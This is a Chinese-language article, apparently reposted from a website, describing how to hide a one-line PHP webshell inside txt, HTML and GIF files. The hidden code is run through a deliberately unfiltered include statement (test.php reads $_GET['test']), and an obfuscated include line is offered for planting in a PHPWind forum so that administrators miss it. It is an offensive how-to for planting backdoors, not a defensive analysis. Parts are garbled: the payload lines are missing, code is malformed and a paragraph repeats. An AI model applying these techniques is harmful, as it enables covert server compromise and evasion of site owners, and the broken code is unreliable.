HP后門的隱藏技巧測試報告

閱讀PHP后門的隱藏技巧測試報告,最近很多朋友都在問我是否能把我

那一句話木馬隱藏到HTML或圖片里，

其實把一句話木馬插入到PHP文件中就已經(jīng)很隱蔽了，

如果說硬是要放到HTML文件或圖片里，就接著往下看這篇的篇測試報告吧。

最近很多朋友都在問我是否能把我那一句話木馬隱藏到HTML或圖片里，

其實把一句話木馬插入到PHP文件中就已經(jīng)很隱蔽了，

如果說硬是要放到HTML文件或圖片里，就接著往下看這篇的篇測試報告吧。

要知道如果光把PHP語句放到圖片里是無論如何也不能執(zhí)行的，

因為PHP只解析擴(kuò)展名為php的文件。所以說要能使隱藏在圖片里的PHP語句執(zhí)行。

我們就的借助PHP中的調(diào)用函數(shù) ：include 、require 等。

我們還記得前些日子把木馬隱藏到圖片的文章吧。

也就是在PHP文件里用include("x.gif")這樣的語句來調(diào)用隱藏在圖片的木馬語句。

ASP中語句也類似。看似非常隱蔽但直接調(diào)用圖片對稍微懂點(diǎn)PHP的人

就不難發(fā)現(xiàn)可疑之處。由于URL 里用GET方式很難傳遞參數(shù)，

這就使得插入木馬的性能得不到發(fā)揮。

Include 函數(shù)在PHP中使用的比較頻繁，所以引起的安全問題也實在太多，

例如PHPWIND1.36的漏洞就是因為include后面的變量沒做過濾引起的。

由此我們就可以構(gòu)造類似的語句來插入到PHP文件中。

然后把木馬隱藏到圖片或HTML文件里，可以說隱蔽性就更高了。

如在PHPWIND論壇里插入

下面的語句：

＜‘’?@include includ/.$PHPWIND_ROOT;? ＞?

一般管理員是無法看出來的。

有了include 函數(shù)來輔助幫忙我們就可以把PHP木馬隱藏到

諸如 txt、html和圖片文件等很多類型的文件里來了。

因為txt、html和圖片文件這三種類型的文件最無論在論壇

還是文章系統(tǒng)里是最為常見的了，下面我們就依次來做測試。

首先建立一PHP文件test.php 文件內(nèi)容為:

$test=$_GET['test'];

@include 'test/'.$test;

?＞

Txt文件一般都是說明文件，所以我們把一句話木馬放到目錄的說明文件里就OK了。

隨便建立一個TXT文件t.txt。我們把一句話木馬粘貼到t.txt文件里。

然后訪問 http://localhost/test/test.php?test=../t.txt?

如果你看到t.txt的內(nèi)容就證明Ok了， 然后把在lanker微型PHP后門客戶端

木馬地址添入 http://localhost/test/test.php?test=../t.txt?

密碼里添入cmd就可以了，執(zhí)行返回的結(jié)果都可以看到。

對于HTML的文件，一般都為模版文件。為了使插入到HTML的文件的木馬

能被調(diào)用執(zhí)行而且不被顯示出來，我們可以在HTML里加入一個隱藏屬性的文本框 ，

如： 然后使用方法同上。執(zhí)行的返回結(jié)果一般都可以查看源文件看到。?

如使用查看本程序目錄功能。

查看源文件內(nèi)容為我可以得到目錄為：

?C:\Uniserver2_7s\www\test。

下面我們說說圖片文件，要說最為毒的一招莫過于把木馬隱藏到圖片里。

我們可以直接對一個圖片進(jìn)行編輯，把插入到圖片末尾。

經(jīng)測試一般都不會對圖片造成影響。然后同樣方法客戶端木馬地址添入

我們查看PHP環(huán)境變量返回的是結(jié)果是原圖片。

這里可能要和我們想象的結(jié)果有些差距了，其實命令已經(jīng)運(yùn)行了，

只是返回的結(jié)果看不到而已，因為這是真正的GIF文件，

所以是不會顯示返回結(jié)果的，為了證明是否真的執(zhí)行了命令我們

執(zhí)行上傳文件命令。果不出所料，文件已經(jīng)成功上傳到服務(wù)器上。

這樣偽造的優(yōu)點(diǎn)是隱蔽性好。缺點(diǎn)也自然不用說了是沒回顯。

如果你想看到返回的結(jié)果，那就拿出記事本偽造一個假的圖片文件吧。

到這里就基本測試完了，怎樣隱蔽PHP后門就看你自己的選擇了。

行文倉促，如有不妥之處，請指出!

本文來源：https://www.fushouyu.com/shouyou/160.html